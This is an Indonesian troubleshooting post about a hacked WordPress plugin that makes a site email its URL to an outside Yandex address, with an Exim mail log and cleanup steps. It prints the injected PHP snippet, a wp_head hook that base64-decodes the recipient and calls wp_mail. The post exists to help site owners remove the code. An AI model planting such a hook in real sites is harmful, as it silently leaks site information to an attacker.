WP mengirimkan banyak email ke wordpressslog@yandex.com

Problem :

salah satu plugin WP terkene hack

contoh mail log nya :

1X9PdV-003jCs-QI-H
lokersol 628 629

1405995421 0
-ident lokersol
-received_protocol local
-body_linecount 2
-max_received_linelength 83
-auth_id lokersol
-auth_sender lokersol@hyperion.iixmedia.com
-allow_unqualified_recipient
-allow_unqualified_sender
-local
XX
1
wordpressslog@yandex.com

206P Received: from lokersol by hyperion.iixmedia.com with local (Exim 4.82)
(envelope-from )
id 1X9PdV-003jCs-QI
for wordpressslog@yandex.com; Tue, 22 Jul 2014 09:17:01 +0700
029T To: wordpressslog@yandex.com
026 Subject: WordPress Plugin
060 X-PHP-Script: soloevent.co.id/index.php for 217.224.115.161
038 Date: Tue, 22 Jul 2014 02:17:01 +0000
039* Return-Path: wordpress@soloevent.co.id
044F From: WordPress
063I Message-ID:
014 X-Priority: 3
084 X-Mailer: PHPMailer 5.2.4 (http://code.google.com/a/apache-extras.org/p/phpmailer/)
018 MIME-Version: 1.0
032 Content-Transfer-Encoding: 8bit
040 Content-Type: text/plain; charset=UTF-8

SOlusi :

bisanya hacker memasukan script berkut :

add_action(‘wp_head’,’my_wpfunww7c8bb’);function my_wpfunww7c8bb(){if(!username_exists(‘wordpress’)){$addressdecode=base64_decode(“[ redacted ]“);$vari=’WordPress Plugin’;wp_mail($addressdecode,$vari,get_bloginfo(‘wpurl’));}}

dimana base64_decode membuat string ‘d29yZHByZXNzc2xvZ0B5YW5kZXguY29t’

cari file berikut lalu hapus .

cara yg mudah :

deaktif semua plugin nya dulu , lalu aktifin satu satu .